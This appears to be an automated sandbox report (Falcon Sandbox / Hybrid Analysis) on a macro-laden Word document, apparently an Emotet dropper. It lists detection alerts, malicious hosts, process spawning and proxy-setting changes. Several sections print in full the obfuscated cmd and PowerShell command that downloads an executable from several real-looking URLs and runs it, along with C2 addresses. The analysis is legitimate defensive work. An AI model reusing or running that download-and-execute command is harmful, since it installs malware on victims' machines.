02vPLpWc
This report is generated from a file or URL submitted to this webservice on May 17th 2018 09:52:19 (UTC)
Guest System: Windows 7 32 bit, Home Premium, 6.1 (build 7601), Service Pack 1, Office 2010 v14.0.4
Report generated by Falcon Sandbox v8.10 © Hybrid Analysis
Incident Response
Risk Assessment
- Remote Access
- Uses network protocols on unusual ports
- Persistence
- Spawns a lot of processes
- Network Behavior
- Contacts 1 domain and 3 hosts
Additional Context
Related Sandbox Artifacts
- Associated URLs
  - hxxp://avirtualassistant.net/02vPLpWc/
Indicators
Not all malicious and suspicious indicators are displayed.
Malicious Indicators 12
External Systems
Detected Suricata Alert
- details
  - Detected alert "ETPRO TROJAN W32/Emotet CnC Checkin" (SID: 2830701, Rev: 2, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.)
  - Detected alert "ET POLICY PE EXE or DLL Windows file download HTTP" (SID: 2018959, Rev: 3, Severity: 1) categorized as "Potential Corporate Privacy Violation"
- source
  - Suricata Alerts
- relevance
  - 10/10
Found an IP/URL artifact that was identified as malicious by a significant amount of reputation engines
- details
  - 3/67 reputation engines marked "http://ifcingenieria.cl" as malicious (4% detection rate)
- source
  - External System
- relevance
  - 10/10
Sample was identified as malicious by at least one Antivirus engine
- details
  - 7/57 Antivirus vendors marked sample as malicious (12% detection rate)
- source
  - External System
- relevance
  - 8/10
General
Document spawns new processes
- details
  - Document spawned a new process (macro present)
- source
  - Indicator Combinations
- relevance
  - 7/10
GETs files from a webserver
- details
"GET /76j4qo/ HTTP/1.1Host: ifcingenieria.clConnection: Keep-Alive"
"GET / HTTP/1.1Cookie: 22986=YfPsLfSbd4Y/yDt9dkvBSyvzDiRk06hQ5kQKootMxRN16gKf7UDw5xeHQLGa+63Wa0LEVngjmjKQ6hEk5Dzv7Z6dLgr1u/GUPvPdvLwQwpGMoAqqBHs1nd2IkkR1JLMCqAsQ9a/GfLtFsCWc5Ht5U5YctPH0LQcsHMl8hpOvk3qoq5Z3KA42kojnnkoWCvXUDeTyBS/rUgviG4oaBZKYIO7Mrw4KazYAWAVZtMGA7qrGrnyrb/DMu81dPHWovrDOa2smKTNrTdvKCagZSdJhgFgqJy1JZwHDpBSiuiKgmzgULEjmMZAZ7l8UR91gAP9iPPkT+vCJ8sEKv4r6Rs4AmisCKCx8Xb1TT1c6T+yoa+rTHauO808jGdH+om/jDqXJYzas5zuOKxkZ3YIL3GpCjMqhZEVkext9KubxIwe6Ww8zbnjIUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 81.21.67.85:8080Connection: Keep-AliveCache-Control: no-cache" - source
  - Network Traffic
- relevance
  - 10/10
Installation/Persistence
Writes data to a remote process
- details
"cmd.exe" wrote 32 bytes to a remote process "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe" (Handle: 84)
"cmd.exe" wrote 52 bytes to a remote process "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe" (Handle: 84)
"cmd.exe" wrote 4 bytes to a remote process "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe" (Handle: 84)
"powershell.exe" wrote 32 bytes to a remote process "%PUBLIC%\166520.exe" (Handle: 1548)
"powershell.exe" wrote 52 bytes to a remote process "%PUBLIC%\166520.exe" (Handle: 1548)
"powershell.exe" wrote 4 bytes to a remote process "%PUBLIC%\166520.exe" (Handle: 1548)
"166520.exe" wrote 32 bytes to a remote process "%WINDIR%\System32\cosineinit.exe" (Handle: 436)
"166520.exe" wrote 52 bytes to a remote process "%WINDIR%\System32\cosineinit.exe" (Handle: 436)
"166520.exe" wrote 4 bytes to a remote process "%WINDIR%\System32\cosineinit.exe" (Handle: 436) - source
  - API Call
- relevance
  - 6/10
Network Related
Malicious artifacts seen in the context of a contacted host
- details
Found malicious artifacts related to "138.0.120.12": ...
URL: http://vertek.cl/ (AV positives: 1/67 scanned on 04/27/2018 15:47:08)
URL: http://ifcingenieria.cl/ (AV positives: 3/67 scanned on 04/26/2018 10:45:03)
URL: http://ifcingenieria.cl/ni9tsuvgzii (AV positives: 3/67 scanned on 04/25/2018 18:44:00)
URL: http://ifcingenieria.cl/ni9TSuVGZII/ (AV positives: 2/67 scanned on 04/25/2018 17:24:27)
URL: http://kundaliniyogasimran.cl/WysiwygPro/editor_files/_images/cds-food-azar/cooking-a-smoked-pork-shoulder-picnic.html (AV positives: 1/67 scanned on 03/22/2018 07:35:55)
File SHA256: 3801181d5eec749898527ebc4279741acbc9f82c8aa72f8be272031d67eea76b (AV positives: 10/59 scanned on 04/25/2018 13:51:22)
File SHA256: 3f73123b71be81eb666247aaee7f7fb33ffc0160f29c586623067044b6521bb0 (AV positives: 10/70 scanned on 04/25/2018 11:56:13)
File SHA256: 77795c8a3c5a8ff8129cb4db828828c53a590f93583fcfb0b1112a4e670c97d4 (AV positives: 1/56 scanned on 05/19/2017 09:54:38)
File SHA256: a2cad944f3399bde2a5691c14be8b4f939898b5a97dadd579aff3390cdf3624f (AV positives: 1/56 scanned on 07/19/2016 09:29:10) - source
  - Network Traffic
- relevance
  - 10/10
Uses network protocols on unusual ports
- details
  - TCP traffic to 81.21.67.85 on port 8080
- source
  - Network Traffic
- relevance
  - 7/10
Unusual Characteristics
Contains embedded VBA macros with keywords that indicate auto-execute behavior
- details
  - Found keyword "AutoOpen" which indicates: "Runs when the Word document is opened"
- source
  - Static Parser
- relevance
  - 10/10
Spawns a lot of processes
- details
Spawned process "WINWORD.EXE" with commandline "/n "C:\02vPLpWc.doc"" (Show Process)
Spawned process "cmd.exe" with commandline "Cmd NiFNFLos YkMLGzjoazWTFMzoErTtjZAZ btnSkEoS & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %HvpurunsRmnvjbm%=zJlPRBwG&&set %pKskGkVXEDjT%=p&&set %dowlFKYHb%=o^w&&set %GTHGTVYqDCTUTHV%=JNMwizhaTsz&&set %LYpRJHtwuOCsR%=!%pKskGkVXEDjT%!&&set %fFhDGzjnXmhYvNz%=hHRrroJFEpzXJ&&set %musHwkwosI%=e^r&&set %fBZnrWF%=!%dowlFKYHb%!&&set %oXmdLMdsYfUoN%=s&&set %lhmbWskWwNVkUzp%=oQllFASCBHr&&set %XwERnXf%=he&&set %mGqOdYnIP%=ll&&!%LYpRJHtwuOCsR%!!%fBZnrWF%!!%musHwkwosI%!!%oXmdLMdsYfUoN%!!%XwERnXf%!!%mGqOdYnIP%! ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 
9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um
19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um
[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112)
[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+'
[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74)
[CHA'+'R]39 -CReplace 9Um1'+'xA9Um
'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC',[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106),[cHar]124))" (Show Process), Spawned process "powershell.exe" with commandline "powershell ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um
19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um
[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112)
[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+'
[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74)
[CHA'+'R]39 -CReplace 9Um1'+'xA9Um
'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC'
[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106)
[cHar]124))" (Show Process), Spawned process "166520.exe" (Show Process), Spawned process "cosineinit.exe" (Show Process) - source
  - Monitored Target
- relevance
  - 8/10
Hiding 2 Malicious Indicators
Suspicious Indicators 13
External Systems
Detected Suricata Alert
- details
  - Detected alert "ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download" (SID: 2016538, Rev: 3, Severity: 2) categorized as "Potentially Bad Traffic"
- source
  - Suricata Alerts
- relevance
  - 10/10
Found an IP/URL artifact that was identified as malicious by at least one reputation engine
- details
  - 3/67 reputation engines marked "http://ifcingenieria.cl" as malicious (4% detection rate)
- source
  - External System
- relevance
  - 10/10
General
Found a potential E-Mail address in binary/memory
- details
  - Pattern match: "lrqjor@acfarihso2squ.eozmftwzaojzglmgx275315aeb"
  - Pattern match: "570kmqatvuhjlu@qculdb.8z59uesf7p82066"
  - Pattern match: "sczcin3c7bopwqupp@51rtqrehb58ot.rddqrbi"
  - Pattern match: "pe9eldtfifdaex@lnwbyu9odpe9.uyy"
  - Pattern match: "tn@eilcbetw.ten.mu"
- source
  - File/Memory
- relevance
  - 3/10
Installation/Persistence
Creates new processes
- details
  - "WINWORD.EXE" is creating a new process (Name: "%WINDIR%\System32\cmd.exe", Handle: 1308)
  - "cmd.exe" is creating a new process (Name: "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe", Handle: 84)
  - "powershell.exe" is creating a new process (Name: "%PUBLIC%\166520.exe", Handle: 1548)
  - "166520.exe" is creating a new process (Name: "%WINDIR%\System32\cosineinit.exe", Handle: 436)
- source
  - API Call
- relevance
  - 8/10
Drops executable files
- details
  - "166520.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
- source
  - Binary File
- relevance
  - 10/10
Opens the MountPointManager (often used to detect additional infection locations)
- details
  - "WINWORD.EXE" opened "\Device\MountPointManager"
  - "powershell.exe" opened "\Device\MountPointManager"
  - "166520.exe" opened "\Device\MountPointManager"
- source
  - API Call
- relevance
  - 5/10
Network Related
Found potential IP address in binary/memory
- details
  - "81.21.67.85"
- source
  - File/Memory
- relevance
  - 3/10
Uses a User Agent typical for browsers, although no browser was ever launched
- details
  - Found user agent(s): Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
- source
  - Network Traffic
- relevance
  - 10/10
System Security
Modifies proxy settings
- details
  - "powershell.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
  - "powershell.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
  - "cosineinit.exe" (Access type: "SETVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYENABLE"; Value: "00000000")
  - "cosineinit.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYSERVER")
  - "cosineinit.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYOVERRIDE")
- source
  - Registry Access
- relevance
  - 10/10
Unusual Characteristics
Contains embedded VBA macros with suspicious keywords
- details
  - Found suspicious keyword "Shell" which indicates: "May run an executable file or a system command"
  - Found suspicious keyword "Chr" which indicates: "May attempt to obfuscate specific strings (use option --deobf to deobfuscate)"
  - Found suspicious keyword "StrReverse" which indicates: "May attempt to obfuscate specific strings (use option --deobf to deobfuscate)"
- source
  - Static Parser
- relevance
  - 10/10
Executes powershell accessing native variables
- details
Process "powershell.exe" with commandline "powershell ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um
19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um
[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112)
[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+'
[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74)
[CHA'+'R]39 -CReplace 9Um1'+'xA9Um
'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC'
[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106)
[cHar]124))" (Indicator: "$pshome"
UID: 00045885-00003800) - source
  - Monitored Target
- relevance
  - 10/10
Extensive usage of escape characters in the commandline
- details
Process "cmd.exe" with commandline "Cmd NiFNFLos YkMLGzjoazWTFMzoErTtjZAZ btnSkEoS & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %HvpurunsRmnvjbm%=zJlPRBwG&&set %pKskGkVXEDjT%=p&&set %dowlFKYHb%=o^w&&set %GTHGTVYqDCTUTHV%=JNMwizhaTsz&&set %LYpRJHtwuOCsR%=!%pKskGkVXEDjT%!&&set %fFhDGzjnXmhYvNz%=hHRrroJFEpzXJ&&set %musHwkwosI%=e^r&&set %fBZnrWF%=!%dowlFKYHb%!&&set %oXmdLMdsYfUoN%=s&&set %lhmbWskWwNVkUzp%=oQllFASCBHr&&set %XwERnXf%=he&&set %mGqOdYnIP%=ll&&!%LYpRJHtwuOCsR%!!%fBZnrWF%!!%musHwkwosI%!!%oXmdLMdsYfUoN%!!%XwERnXf%!!%mGqOdYnIP%! ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 
9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um
19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um
[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112)
[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+'
[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74)
[CHA'+'R]39 -CReplace 9Um1'+'xA9Um
'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC',[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106),[cHar]124))" (UID: 00045852-00002952, Additional Context: "Cmd NiFNFLos YkMLGzjoazWTFMzoErTtjZAZ btnSkEoS & %comSpEc% %comSpEc% /V /c set %HvpurunsRmnvjbm%=zJlPRBwG&&set %pKskGkVXEDjT%=p&&set %dowlFKYHb%=ow&&set %GTHGTVYqDCTUTHV%=JNMwizhaTsz&&set %LYpRJHtwuOCsR%=!%pKskGkVXEDjT%!&&set %fFhDGzjnXmhYvNz%=hHRrroJFEpzXJ&&set %musHwkwosI%=er&&set %fBZnrWF%=!%dowlFKYHb%!&&set %oXmdLMdsYfUoN%=s&&set %lhmbWskWwNVkUzp%=oQllFASCBHr&&set %XwERnXf%=he&&set 